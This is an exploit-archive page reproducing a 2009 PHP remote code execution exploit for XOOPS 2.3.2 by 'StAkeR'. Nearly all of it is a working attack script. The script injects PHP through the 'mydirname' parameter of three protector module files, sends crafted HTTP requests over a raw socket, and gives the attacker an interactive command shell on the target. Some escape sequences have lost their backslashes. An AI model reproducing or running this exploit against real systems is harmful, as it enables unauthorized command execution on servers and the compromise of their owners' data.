[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit
# Published : 2009-01-08
# Author : StAkeR
# Previous Title : Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit
# Next Title : DMXReady Document Library Manager <= 1.1 Contents Change Vuln
#!/usr/bin/php -q
<?php
/****************************************************************
* XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit *
* by athos - staker[at]hotmail[dot]it *
* http://xoops.org *
* *
* thanks to s3rg3770 and The:Paradox *
* *
* works with register globals on *
* note: this vuln is a remote php code execution *
* *
* Directory (xoops_lib/modules/protector/) *
* onupdate.php?mydirname=a(){} [PHP CODE] function v *
* oninstall.php?mydirname=a(){} [PHP CODE] function v *
* notification.php?mydirname=a(){} [PHP CODE] function v *
****************************************************************/
error_reporting(0);
list($cli,$host,$path,$num) = $argv;
if ($argc != 4) {
print "n+--------------------------------------------------------------+n";
print "r| XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit |n";
print "r+--------------------------------------------------------------+n";
print "rby athos - staker[at]hotmail[dot]it / http://xoops.orgn";
print "rUsage: php xpl.php [host] [path]nn";
print "rhost + localhostn";
print "rpath + /XOOPSn";
exit;
}
exploit();
function exploit() {
global $num;
if ($num > 3) {
die("n$num isn't a valid optionn");
}
else {
yeat_shell();
}
}
function yeat_shell() {
while (1) {
echo "yeat[php-shell]~$: ";
$exec = stripslashes(trim(fgets(STDIN)));
if (preg_match('/^(exit|--exit|quit|--quit)$/i',$exec)) die("nExitedn");
if (preg_match('/^(help|--help)$/i',$exec)) echo("nExample: uname -an");
if (preg_match('/^(about|--about)$/i',$exec)) echo("nstaker[at]hotmail[dot]itn");
print data_exec($exec);
}
}
function data_exec($exec) {
global $host,$path,$num;
if ($num == 1) {
$urlex = "/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}";
}
if ($num == 2) {
$urlex = "/xoops_lib/modules/protector/notification.php?mydirname=a(){}";
}
if ($num == 3) {
$urlex = "/xoops_lib/modules/protector/oninstall.php?mydirname=a(){}";
}
$exec = urlencode($exec);
$data .= "GET /{$path}/{$urlex}{$exec}function%20v HTTP/1.1rn";
$data .= "Host: {$host}rn";
$data .= "User-Agent: Lynx (textmode)rn";
$data .= "Connection: closernrn";
$html = data_send ($host,$data);
return $html;
}
function data_send ($host,$data) {
if (!$sock = @fsockopen($host,80)) {
die("Connection refused,try again!n");
} fputs($sock,$data);
while (!feof($sock)) { $html .= fgets($sock); }
fclose($sock);
return $html;
}
# www.Syue.com [2009-01-08]